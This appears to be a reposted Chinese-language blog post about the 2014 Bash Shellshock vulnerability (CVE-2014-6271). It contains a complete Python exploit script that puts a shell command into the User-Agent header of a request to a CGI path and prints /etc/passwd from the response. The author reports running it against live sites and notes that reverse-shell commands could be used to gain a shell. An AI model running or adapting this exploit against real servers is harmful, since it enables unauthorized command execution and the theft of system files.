Bash遠(yuǎn)程命令執(zhí)行漏洞(CVE-2014-6271)分析利用
這幾天Bash被爆存在遠(yuǎn)程命令執(zhí)行漏洞(CVE-2014-6271),昨天參加完isc,晚上回家測(cè)試了一下,寫(xiě)了個(gè)python版本的測(cè)試小基本,貼上代碼:
#coding:utf-8 import urllib,httplib import sys,re,urlparse #author:nx4dm1n #website:www.nxadmin.com def bash_exp(url): urlsp=urlparse.urlparse(url) hostname=urlsp.netloc urlpath=urlsp.path conn=httplib.HTTPConnection(hostname) headers={"User-Agent":"() { :;}; echo `/bin/cat /etc/passwd`"} conn.request("GET",urlpath,headers=headers) res=conn.getresponse() res=res.getheaders() for passwdstr in res: print passwdstr[0]+':'+passwdstr[1] if __name__=='__main__': #帶http if len(sys.argv)<2: print "Usage: "+sys.argv[0]+"www.nxadmin.com/cgi-bin/index.cgi" sys.exit() else: bash_exp(sys.argv[1]) |
腳本執(zhí)行效果如圖所示:
bash命令執(zhí)行
也可以用burp進(jìn)行測(cè)試。
利用該漏洞其實(shí)可以做很多事情,寫(xiě)的python小腳本只是執(zhí)行了cat /etc/passwd。可以執(zhí)行反向鏈接的命令等,直接獲取一個(gè)shell還是有可能的。不過(guò)漏洞存在的條件也比較苛刻,測(cè)試找了一些,發(fā)現(xiàn)了很少幾個(gè)存在漏洞。
posted on 2014-11-26 14:20 順其自然EVO 閱讀(535) 評(píng)論(0) 編輯 收藏 所屬分類(lèi): 測(cè)試學(xué)習(xí)專(zhuān)欄 、安全性測(cè)試